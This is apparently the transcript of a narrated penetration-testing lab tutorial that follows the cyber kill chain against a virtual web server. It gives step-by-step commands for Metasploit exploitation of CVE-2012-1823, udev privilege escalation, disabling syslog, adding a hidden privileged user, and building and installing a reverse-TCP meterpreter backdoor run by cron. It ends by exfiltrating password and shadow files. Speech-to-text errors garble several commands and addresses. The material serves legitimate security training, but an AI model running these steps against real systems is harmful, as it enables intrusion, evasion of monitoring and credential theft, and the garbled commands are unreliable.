Welcome to this attack simulation session. This session simulates a cyber attack against virtual machines in a laboratory environment. The cyber attack follows the Lockheed Martin cyber kill chain. More information on the kill chain can be found by following the included link. All the vulnerabilities and exploits shown are well known. All the tools used are open source or free versions. Please only perform penetration testing on networks and systems where you have authorization. This kill chain is simple and commonly used with only 7 steps. The 7 steps include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and lastly actions. The virtual network used for this session is made up of 3 zones including fake internet, demilitarized zone, or DMZ, and inside. The fake internet simulates the actual internet where most attacks will come from. The demilitarized zone contains services that the organization wants to share with the internet, such as the web server. The inside contains the protected services that are only used by the organization and are not shared with the internet. The zones are separated and protected by firewalls. In addition to the firewalls, the network also contains mitigations such as intrusion detection and logging. Welcome to the reconnaissance portion of the session. During this session you will discover what can be accessed on the target along with any information on software versions and vulnerabilities. The tools used for this session include Kali Linux, Nmap, and Nuclei. Here is the network overview diagram. The reconnaissance will focus on the attacker in the fake internet scanning the web server in the demilitarized zone. The scan results will depend on what is running on the web server and what is permitted through outside firewall. Switch to your Kali Linux machine. Here is a web browser showing the web page at the address of 192.168.4.85. So, you know that there is a web server running on the target. Let's see what else we can find out about the target. Open a terminal window and run Nmap with the options shown on the screen. The Nmap results will be saved to a file. The Nmap scan will take a few minutes to complete. We can skip ahead to the results. Use the cat command to view the contents of the Nmap scan. It looks like the target is running a bind DNS server and an Apache web server. Now run a Nuclei vulnerability scan against the target with the options shown on the screen. The Nuclei results will be shown and saved to a file. The Nuclei scan will take a few minutes to complete. We can skip ahead to the results. Here are the results of the Nuclei scan. The scan contains a good deal of useful information. Pay particular attention to CVE 2012-1823. This is a high-level vulnerability allowing remote code execution. Welcome to the weaponization portion of the session. During this short session you will use what you discovered in the reconnaissance session to find an existing weapon. The tools used for this session include Kali Linux and the Metasploit framework. Fortunately, Metasploit includes numerous weapons which can be used against many known vulnerabilities. Here is the network overview diagram. Weaponization will focus on the attacker on the fake internet utilizing Metasploit to find an existing weapon. Switch to your Kali Linux machine. This Kali Linux machine is showing where we left off from the reconnaissance session with the nuclei results. Please start up the Metasploit console with the command msf console. It may take a few moments to start up. Once you are at the Metasploit console prompt, it's time to search for useful weapons. Since the earlier scan detected a vulnerability associated with a known CVE, you can just search for that. The command is search CVE:2012-1823. Metasploit found an exploit module for the vulnerability. You can see additional information about the module including the disclosure date, rank, and description. Please remember the name of this exploit module because it will be used in the next section of the session. Welcome to the delivery and exploitation portion of the session. During this session you will deliver and use the weapon found in the weaponization session. The tools used for this session include Kali Linux and the Metasploit framework. Metasploit will deliver the weapon and exploit the target. Here is the network overview diagram. Delivery and exploitation will focus on the attacker on the fake internet utilizing Metasploit to deliver the weapon and exploit the target. Switch to your Kali Linux machine. If you haven't already done so, please start up the Metasploit console with the command msf console. It may take a few moments to start up. Once you are at the Metasploit console prompt, instruct Metasploit to use the weapon found in the previous section with the following command. Use exploit/multi/http/php_cgi_arg_injection. Then set the rhost option for this weapon with the following command. Set rhost 192.168.4.85. Rhost is the IP address of the target machine. Then instruct Metasploit to run the exploit by simply entering exploit. It should only take a few moments for the exploit to finish. When it is successful, you will be at the Met-Erpter prompt. Now enter GetUID to see your current username on the target machine. It should be the www.data user. You can also enter other commands into the Met-Erpter prompt, such as ls to view the contents of the current directory on the target machine. Welcome to the installation portion of the session. This session continues from the previous session where you exploited the target machine. During this session you will take your existing access on the target machine as the www user and escalate your privilege to the root user. You will then reduce logging on the target machine and increase persistence by adding a new user. The tools used for this session include Kali Linux and the Metasploit framework. This session is broken into 3 subsections, which are privilege escalation, reduce logging, and persistence. A new privileged user will be created in the persistence subsection. Here is the network overview diagram. Installation will focus on the attacker on the fake internet utilizing Metasploit to deliver and run the privilege escalation exploit on the target. For this privilege escalation attack to succeed, you must have a session connected to the target machine and be at the meterpreter prompt. Please redo the steps shown in the delivery and exploitation session if you do not. The first subsection is privilege escalation. The goal of this subsection is to elevate our privileges from the www data user to the root user. The target machine is running Linux kernel version 2.6.24 and is vulnerable to a UDEV netlink privilege escalation attack. Information on this vulnerability can be found in CVE 2009-1185. Metasploit has a module for exploiting this vulnerability, so we will use that to perform the privilege escalation. Enter the following commands at the meterpreter prompt. You first need to put the meterpreter session in the background before you can use the appropriate exploit. Background. Sessions. Now you can configure and use the exploit. Use Linux/local/udev_netlink. Show targets. This target is an x86 system. Set target 0. Sessions. You should only have one session available. Set session 1. Exploit. It may take a minute for the exploit to complete. GetUID. You should now be the root user and have full privileges on the target machine. After gaining access to the target machine, we don't want anyone noticing us. One way to do this is to reduce the logging being done by the target machine. First, we want to stop the syslog service. To do this, you need to access the shell on the target machine by typing shell at the meterpreter prompt. Shell. The version of Linux running on the target is a bit older, so here is how to find and stop the syslog service. Get a directory listing of all the available services on the target machine. ls/etc/init.d. Stop the syslog service. /etc/init.d/syslog stop. Next, we want to change the console kernel logging level to error or higher. This will prevent messages being generated for what will be done in the next steps. Still in the shell, enter the following commands. cat/proc/sys/kernel/print. tmesc n3. cat/proc/sys/kernel/print. The 3 shown above is the new current logging level. The next goal is to maintain root access to the target machine, even after a reboot. There are multiple ways to achieve persistence. One easy way to achieve persistence is to create a new privileged user account. This should be done after you have exploited the target and gained root access. This is continuing from the previous step. Already on the target machine as root user. Already in the meterpreter shell. In the shell, add a new user and assign it a password. You will be asked twice for a password after entering the password command. Note, replace Mike with your new account name. User add C test account s/bin/bash m g root sudo admin Mike. Password Mike. Type exit again to return from the shell to Meterpreter. You have now created a new privileged user on the target machine. Welcome to the command and control portion of the session. This session continues from the previous session where you created a new privileged user on the already exploited target machine. During this session you will maintain access to the target machine by having it automatically run a program that phones home to the attacker's command and control listener. The tools used for this session include Kali Linux and the Metasploit framework. This session is broken into 4 subsections, which are create the payload, deliver the payload, get the payload to run automatically and set up the listener. The listener will act as your command and control server. Here is the network overview diagram. Command and control will focus on the attacker on the fake internet utilizing Metasploit to create, deliver and run a payload on the target. The first subsection is creating the payload. Metasploit includes a program called MSF Venom which we will use to create our payload. On your Kali Linux machine, open a terminal window and enter the following commands. cd tilde. This will change to the user's home directory. msvenom p linux/x86/meterpreter/reverse_tcp lost equals 10.0.1.70 port equals 5555 f11 o meterpreter_x86. This will create a payload file called meterpreter_x86 in your home directory. Port is the port that the CNC server will be listening on. This payload will cause the target machine to set up a TCP connection to 10.0.1.70 on port 5555. Having the target machine initiate the connection often bypasses existing firewall rules. The next step is to upload the payload that you just created to the target machine. You must be at the Metasploit Meterpreter prompt and on the target machine as the root user. If you are not, please repeat the steps from delivery and exploitation and privilege escalation until you are at the Meterpreter prompt as the root user. The following command will upload the payload to the target machine from the Meterpreter prompt. upload/home/kali/meterpreter_x86. That should have uploaded the file to the root directory on the target machine. It is better to place the file in the home directory of the user we created in the persistent step of the installation portion of this session. Let's also rename the file as something more benign like file_check. We also need to make the file executable. From the Meterpreter, go back into the shell and enter the following commands. Shell. mv/meterpreter_x86/home/mike/file_check. chmod +x/home/mike/file_check. The payload should now be on the target machine in the home directory of the user that you created in the persistent step of the installation portion of this session. The payload is now named file_check and is executable. You can manually run the file_check command, and it will connect to your CNC server, once it is set up in the steps below, but it's better to have it run automatically. To do this, set up a simple cron job that will run on the target machine as the new privileged user. Cron runs programs automatically at given intervals. The example below runs every 5 minutes. Still in the shell, do the following commands. Use the new user account that you created during the installation phase in place of a mic. Su, mic. Huami. Crontab, L a micron. Echo *********/home/mic/file_check micron. Crontab micron. Crontab L. Those commands will switch you to the mic account, create a new file, edit the file, add it to cron, and verify. The file check command should now run automatically every 5 minutes and connect to the command and control listener that you set up in the next section. Metasploit can act as a command and control listener, so that is what we will be using. On your Kali Linux machine, open a terminal window and enter the following commands. MSF console. Use exploit/multi/handler. Set payload Linux/x86/meterpreter/reverse_TCP. Set lhost 10.0.1.70. Set lport 5555. Exploit. It may take a few moments for the reverse TCP listener to start. Those commands will start the Metasploit framework console. Tell it to use exploit/multi/handler as a listener for remote connections, set the host to the attack machine's IP address, set the listening port to 5555 and finally start listening. If you use exploit J instead of exploit, Metasploit will listen in the background for incoming connections from target machines. Welcome to the data exfiltration and lateral movement portion of the session. This session continues from the previous session where you set up command and control. During this session you will gather data and files from the target machine. Then you will discover your next target. Getting data and files from the target machine is called data exfiltration. Moving from one target machine to another target machine is called lateral movement. The tools used for this session include Kali Linux and the Metasploit framework. Here is the network overview diagram. Data exfiltration and lateral movement will focus on the attacker on the fake internet utilizing Metasploit to deliver and run the privilege escalation exploit on the target. The database server will also be introduced as the next target. Switch to your Kali Linux machine. There are many valuable files and information on the target system. Only a few items will be shown here. This already assumes that you have root access to the target machine from the previous section on command and control. The Metasploit interpreter can be used to download these files, or you can use the Metasploit interpreter to start a shell on the target where you can view the files and run the commands. Start MSF console. MSF console. Start up a spool to keep the results from the commands that will soon be run. Run the following command from the MSF console. spool/home/kali/exfil.log. Then enter the following commands, these are from the command and control section. Use exploit/multi/handler. Set payload Linux/x86/meterpreter/reverse_TCP. Set lhost 10.0.1.70. Settle port 5555. Exploit. After the target connects to the command and control listener, you should be at the meterpreter prompt. From the meterpreter prompt, run the following commands. sysinfo. Download/etc/password. Download/etc/group. Download/etc/hosts. Download/etc/resolve.conf. Now enter the shell by typing shell. In the shell, run the following commands. Echo password sudo scat/etc/shadow2/dev/null. cat/etc/password. A name a. cat/etc/issue. cat/etc/group. cat/etc/resolve.conf. cat/etc/hosts. arp a. IP route. IP address. Who. PSEF. Netstat, peanut. ENV. LSMOD. Mount. History. To exit the shell, type exit. To exit the meterpreter, type exit. Stop the spool with the following command. Spool off. To exit from MSF console, exit. You should be back at the Kali Linux prompt. Now type ls. You should see the files that you downloaded and the exfil.log. Now view the exfil.log by typing cat/home/kali/exfil.log. Looking at the results of the netstat pnet command, you can see there have been multiple recent connections to 192.168.2.85 on port 3306, which is the port commonly used by MySQL database servers. Reading the /etc/hosts file, you can see that 195.168.2.85 is also known as DB server. Future steps would involve uploading attack tools, like Metasploit, to the current target machine and then attacking the DB server. Then you would continue following the steps shown in this session to find other targets, exploit them, conduct privilege escalation, achieve persistence with command and control, exfiltrate data, find the next target and repeat. Here is a list of the commands used in the data exfiltration and lateral movement portion. Next to each command is a brief explanation of the command. Once again, this is just a sampling of the possible commands that can be run to gather information from the target machine. Welcome to the automation portion of the session. During this session you will learn how to automate most of the steps shown in the previous sessions using Metasploit resource scripts and Linux shell scripts. Automation makes the process faster, repeatable and less prone to human errors. The tools used for this session include Kali Linux and the Metasploit framework, particularly the resource scripts. Here is the network overview diagram. Automation will focus on the attacker on the fake internet utilizing Metasploit to perform actions on the target. Switch to your Kali Linux machine. This is the main resource script, titled all.rc, that was written to automate the process. It begins with starting a spool file where all the commands and results will be stored. It also turns on verbose messaging and kills any existing sessions. Next it performs the initial exploit, waits 5 seconds for that to finish, runs the privilege escalation exploit, waits 5 seconds, calls other resource scripts and finally cleans things up. The installation resource script reduces logging and stops the syslog process. It also uploads and executes the install commands shell script. The install commands shell script further reduces logging and creates a new privileged user. The C&C resource script uploads the backdoor created with the ms-venom command and adds it as a cron job that will be run every 5 minutes. This will have the target machine phone home to a listening post. The exfil resource script begins the process of gathering information and downloading files from the target machine. It additionally uploads and runs the exfil commands shell script. The exfil commands shell script just gathers more information from the target, saves it to the results text file and downloads that. The entire process begins with the -r option when starting the Metasploit console. The time command is just there to show how long the entire automated process takes. As you can see, everything took approximately 18 seconds. Far less time than manually typing everything. I hope that this session has been enjoyable and informative for you. Please be on the lookout for new sessions that should be released soon. Thank you.